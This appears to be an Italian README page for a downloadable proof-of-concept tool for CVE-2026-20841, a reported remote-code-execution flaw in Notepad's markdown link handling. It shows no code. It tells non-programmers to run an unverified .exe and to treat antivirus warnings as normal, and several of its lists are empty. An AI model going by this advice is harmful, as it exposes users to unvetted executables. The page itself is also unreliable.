
🛠 Dimostra l'esecuzione remota di codice in Windows Notepad tramite link markdown che sfruttano protocolli URL non sicuri.
CVE-2026-20841 è una debolezza di sicurezza nota nell'applicazione Windows Notepad. Riguarda la funzionalità markdown, che permette a Notepad di visualizzare testo formattato con link cliccabili. Questa debolezza si verifica perché il motore markdown in esecuzione all'interno di Notepad non limita i tipi di link (chiamati protocolli URL) che consente. Ciò significa che un attaccante può creare un link che, quando cliccato, fa sì che Notepad esegua programmi o comandi che l'utente non intendeva eseguire.
Questo strumento fornisce una Proof of Concept (PoC) per mostrare come funziona questa falla di sicurezza. Aiuta i ricercatori di sicurezza e gli esperti di tecnologia a capire come funziona la vulnerabilità e testare se i sistemi sono a rischio.
Questo progetto è progettato per persone che vogliono:
Non sono richieste competenze di programmazione per eseguire questo software. È meglio utilizzato da professionisti IT o utenti curiosi che vogliono controllare i propri dispositivi Windows.
Prima di utilizzare questo software, assicurati che il tuo computer soddisfi questi requisiti:
Lo strumento di test potrebbe aver bisogno dell'autorizzazione per eseguire programmi sul tuo PC. Potresti vedere avvisi di Windows Defender o antivirus. Questo è normale perché lo strumento simula come potrebbero funzionare attacchi reali.
Dovresti eseguire lo strumento solo su computer di tua proprietà o per cui hai il permesso di testare.
Per ottenere il software, segui questi passaggi:
Vai alla pagina delle release.
Clicca questo grande pulsante per visitare l'area download:
Scegli l'ultima release nella pagina.
Cerca il file che si adatta al tuo sistema (di solito un file .exe o .zip).
Scarica il file.
Clicca sul link del nome del file per avviare il download.
Esegui o decomprimi il software.
.exe, fai doppio clic per eseguirlo..zip, fai clic destro e scegli “Estrai tutto,” poi apri la cartella e fai doppio clic sul .exe al suo interno.Dopo l'installazione, vedrai una finestra semplice con istruzioni. Ecco come procedere:
Lo strumento crea un finto file markdown contenente link che utilizzano gestori URL insoliti. Normalmente, questi link non dovrebbero aprire programmi senza autorizzazione. Ma a causa di CVE-2026-20841, Notepad non li blocca.
Quando esegui il test, il software prova ad aprire questi link in Notepad. Se ci riesce, Notepad è vulnerabile e può permettere agli attaccanti di eseguire codice dannoso.
Per mantenere la precisione del test, scarica le nuove versioni quando disponibili:
Se incontri problemi, puoi:
Questo strumento mostra come gli hacker potrebbero sfruttare le falle di sicurezza. Usalo responsabilmente:
Questo progetto riguarda:
Puoi iniziare a testare ora visitando la pagina download:
Scarica lo strumento CVE-2026-20841